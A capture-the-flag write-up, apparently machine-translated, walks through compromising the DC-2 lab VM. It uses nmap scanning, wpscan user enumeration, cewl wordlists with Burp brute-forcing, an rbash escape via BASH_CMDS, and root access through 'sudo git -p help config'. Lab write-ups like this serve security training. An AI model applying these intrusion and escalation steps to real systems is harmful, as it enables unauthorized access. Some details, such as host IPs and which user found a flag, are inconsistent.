Please note that unauthorized infiltration is illegal.
Table of contents
foreword
DC series target machines are a series of virtual machines specially designed for penetration testing and network security laboratories. These drones provide a range of different vulnerability and attack scenarios, allowing penetration testers to test their skills and tools in these environments. The DC series of drones covers several different topics, such as vulnerabilities of various operating systems, web application security, and wireless network security, etc. They are of great value to both beginners and professionals as they help them understand security vulnerabilities and how to exploit them for penetration testing.
1. Prerequisites
Attack aircraft: Kali
IP address: 192.168.10.137
Target machine: DC-2 (linux)
IP address: 192.168.10.138
DC-2 download link: http://www.five86.com/downloads/DC-2.zip
Network: The two hosts must be in the same LAN, so the network configurators of the virtual machines must be the same (NAT or bridge)
Goal: Find 5 flags
2. Penetration testing
1. Idea
Penetration testing must have ideas, my idea is:
Information collection—> Find vulnerabilities—> Exploit vulnerabilities (sql injection, file upload vulnerabilities, framework vulnerabilities, ssh attacks, etc.)—> Reverse shell
—> Escalate rights
2. Process
2.1 Information Collection
We first use the netdiscover tool to discover active hosts through ARP scanning.
netdiscover -r 192.168.10.0/24
It is found that the IP address of DC-2 is: 192.168.10.139, and then we use the nmap tool to scan the port.
nmap -sS -A -p- 192.168.10.139-sS: TCP synchronous scanning (TCP SYN), because it is not necessary to open a TCP connection all, so this technology is usually called half-open scanning
-A: full scanning method-p:
Found that the target machine has opened port 80 for http protocol and port 7744 for ssh protocol
I opened http://192.168.10.139 and found that the webpage could not be opened, so I thought there would be a hidden port, so I used the nmap tool to scan it again.
nmap -sS -sV -T4 -O -A 192.168.10.139-sV scan the version of the service program on the port
-T0-9 scan speed, generally T4 is enough
-O scan to detect the operating system of the target host
Did not follow redirect to http://dc-2/
Failed to follow redirect to http://dc-2/
Here you need to change the local DNS file or you can’t access it, let’s modify the /etc/hosts file
vim /etc/hosts
192.168.10.139 dc-2
It is found that the website can be accessed
Found the Flag hyperlink, clicked to enter and found the first flag
Flag 1:
Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can't win them all.
Log in as one to see the next flag.
If you can't find it, log in as another.
Your usual word list probably isn't working, so maybe you just need to keep your wits about you.
The more passwords the better, but sometimes you just can't win them all.
Log in as one to see the next sign.
If you cannot find it, please log in as another user.
The flag reminds us that we need to find passwords and users. We use the whatweb tool to scan the framework of this website.
whatweb http://192.168.10.139/
It is found that the framework of this website is WordPress, and then use the dirsearch tool to scan the directory of this website.
dirsearch -u http://192.168.10.139/ -x 403 404 405 500-x filter specified status codes
The admin page was found, and it was judged to be a login page.
2.2 Vulnerability discovery
I tried a weak password, but found it wrong, and then used the msf tool to search for vulnerabilities in the WordPress framework, and found a lot of vulnerabilities. I tried a few times and then gave up. I remembered that the flag reminded us that the more passwords the better, go to Baidu to search Vulnerabilities related to passwords in the WordPress framework, no related vulnerabilities were found but a vulnerability tool related to usernames was found - WPScan
wpscan --url dc-2 -e u
-e u 枚举用户名,默认从1-10
Found three related user names admin, jerry, tom Next is the password, and found that the big guys used the Cewl tool.
Cewl is an application developed in Ruby. You can specify the URL address and crawling depth for its crawler, and you can also add additional external links. Then Cewl will return you a dictionary file. You can use the dictionary to In password cracking tools like John the Ripper. In addition, Cewl also provides a command line tool.
cewl http://dc-2/ -w /root/Desktop/password.txt
The password crawling is complete, and then we write the user to a text file.
2.3 Exploitation
We use the burpsuite tool to capture and blast the obtained user and password.
Blast out two matching account numbers and passwords
tom parturient
jerry adipiscing
Log in on the webpage and find the second flag.
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.If you can't take advantage of WordPress and take a shortcut, there is another way.
Hope you found another entrance.
Flag2 reminds us that we can go through another entrance, which reminds me of ssh, so we use the tom user to enter the remote ssh login of the target machine.
ssh username@ip address -p port
ssh [email protected] -p 7744
I found that I was logged in, checked the permissions, and found that there are rbash restrictions.
rbash, which is a restricted bash, can be used as a transit server (in fact rbash is just a soft link of bash). The difference between it and the general shell is that it will restrict some behaviors, so that some commands cannot be executed.
Let's see what other commands are available.
Then we found that the echo command export command can be used, we use the echo command to see what other system commands can be used.
echo $PATH
echo /home/tom/usr/bin/*
We found that less, ls, scp, and vi commands can still be used, so we searched how to bypass rbash restrictions, and found a blog about bypassing rbash , you can use the following commands to bypass.
# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
It is found that the entry has been bypassed, and the third flag is found, check flag3.txt.
flag3
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Poor old Tom is always running after Jerry. Maybe he should die for the stress he caused.
flag3 prompts us to su, I feel that we need to switch to another user, so I use ssh to remotely log in to the jerry user and find that I can't log in.
So I switched to the jerry user under the tom user according to the prompts, and checked all the relevant flag files under the user.
su jerry
adipiscing
find / -name *flag*
Found falg4.txt, open the relevant directory to view.
cd /home/jerry/
ls
cat cat flag4.txt
flag4
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
Nice to see you've come this far - but you're not home yet.
You still need to get the final banner (the only one that really matters!!)
No hints here - you're on your own now. :-)
Come on, get out of here!!!!
2.4 Escalation of rights
The next step is the most important step - privilege escalation, let's first check what command permissions we have under root.
sudo -l
We found that we can use the git command, and flag4 reminds us that we also have the git command, so it is very likely that the git command is used to elevate the privilege. Let's go to the privilege escalation website to search how the git command can elevate the privilege.
sudo git -p help config
!/bin/sh
After exiting, the privilege is successfully elevated. First, check the privileges and find that you already have root privileges. Enter the root directory and find the fifth flag.
id
cd /root
ls
cat final-flag.txt
So far, the DC-2 target drone has also been penetrated by us.
3. Summary
Breakthrough process of DC-2 shooting range:
1. We collected information first, discovered the http protocol and ssh protocol, changed the DNS and entered the webpage, and found flag1.
2. Then I scanned the website directory according to the prompts, found the login page, obtained the user name through the wpscan tool, and obtained the password through the Cewl tool, then used bp to capture and blast the correct user and password, and logged in as the jerry user , found flag2.
3. According to the prompt, we use ssh to log in remotely. This time, we use tom user to log in. After logging in, we find that there is an rbash restriction, so we use related commands to bypass the rbash restriction entry, so we found flag3 under this user.
4. It reminds us that we need to change the user. We first change the user in ssh and find that we cannot log in, so we change the user when Tom logs in to ssh, and use the find command to find flag4.
5. Elevate the privilege. We found out that the git command can be used under the root user, so we used git to elevate the privilege. After entering the root directory, we found the last flag.